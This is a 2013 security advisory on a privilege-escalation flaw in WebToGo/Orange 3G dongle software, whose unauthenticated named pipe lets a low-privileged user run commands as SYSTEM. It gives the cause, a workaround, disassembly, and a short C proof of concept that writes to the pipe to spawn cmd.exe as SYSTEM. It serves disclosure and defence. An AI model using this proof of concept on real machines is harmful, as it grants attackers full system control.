WebToGo 3G Dongle Software - Named Pipe Arbitrary Command Execution

    Type

  • WebToGo 3G Dongle Software - Named Pipe Arbitrary Command Execution

    • Severity

  • High

    • Affected products

  • WebToGo 3G Dongles

    • Affected Versions

  • Orange Mobile Broadband Version Build Version: 20100830112700 confirmed to be vulnerable, it is expected other previous versions and vendors using WebToGo libraries are vulnerable.

    • Vendor

  • WebToGo

    • Vendor Response

  • A user should receive a prompt to upgrade.

    • Local/Remote

  • Local (see dependencies)

    • Vulnerability Class

  • Privilege Escalation

    • Authors

  • Alex Plaskett

    • Date

  • 2013-02-25

    • CVE Reference

  • N/A

Impact

This vulnerability can be used to perform local privilege escalation on devices which have the software installed.

Cause

The vulnerability exists due to lack of authentication and authorisation being performed on connections to the named pipe.

Interim Workaround

As an interim workaround the OrangeMobileBroadband_Service could be stopped whilst not using the 3G connectivity. However, if 3G is required then this service must be running. Therefore full remediation will require a patch by the vendor.

Solution

A software upgrade message will be promoted, however, it is does not seem possible to force a manual upgrade. Therefore it may be necessary to perform the interim workaround until a patch update is promoted.

Technical Description

A named pipe is exposed from the OrangeMobileBroadband_Service which does not have any security restrictions applied. The service executes by default under the context of SYSTEM user. Therefore a low privileged attacker can communicate with the named pipe to perform functionality exposed by the service.

The following named pipe is exposed from the OrangeMobileBroadband_Service:

"\\\\.\\pipe\\OrangeMobileBroadband_Service

The following additional functionality was found to be exposed by the service and could be abused by an attacker:

  • Arbitrary command execution as SYSTEM
  • Arbitrary registry key creation as SYSTEM
  • Arbitrary file delete as SYSTEM

The following code demonstrates the services ability to spawn arbitrary executable using the ShellExecuteExW function:

.text:004079FE cmp ax, 30h
.text:00407A02 jnz loc_407BF2
.text:00407A08 push offset aParam40RunSpec ; "Param 40 - Run specified
.text:00407A0D call sub_40BB00
.text:00407AB4 lea eax, [esp+8E80h+Dest]
.text:00407ABB mov [esp+8E80h+pExecInfo.lpFile], eax
.text:00407AC2 add esp, 0Ch
.text:00407AC5 mov [esp+8E74h+pExecInfo.cbSize], 3Ch
.text:00407AD0 mov [esp+8E74h+pExecInfo.fMask], 40h
.text:00407ADB mov [esp+8E74h+pExecInfo.hwnd], edi
.text:00407AE2 mov [esp+8E74h+pExecInfo.lpVerb], edi
.text:00407AE9 mov ecx, offset Dependencies
.text:00407AEE lea eax, [esp+8E74h+Data]
.text:00407B76 lea edx, [esp+8E74h+pExecInfo]
.text:00407B7D mov esi, 1
.text:00407B82 push edx
.text:00407B83 mov ; pExecInfo
.text:00407B8A mov [esp+8E78h+pExecInfo.lpDirectory], edi
.text:00407B91 mov [esp+8E78h+pExecInfo.nShow], esi
.text:00407B98 call [esp+8E78h+pExecInfo.hInstApp], edi
ds:ShellExecuteExW

Exploitation

The following code can be used to demonstrate a low privileged user spawning a cmd.exe shell with the SYSTEM privileges.

HANDLE hPipe;
wchar_t str[] =
L"\x34\x30|C:\\Windows\\System32\\cmd.exe|args|args|args";
hPipe = CreateFile(L"\\\\.\\pipe\\OrangeMobileBroadband_Service",
GENERIC_WRITE, 0, 0, OPEN_EXISTING, 0, 0);
DWORD dwRead = 0;
WriteFile(hPipe, (LPVOID)&str, sizeof(str), &dwRead, 0);

Dependencies

In order to exploit this vulnerability an attacker requires a low privileged account on the system. However, this issue can be exploited remotely through the named pipe if a low privileged user account is known for the system.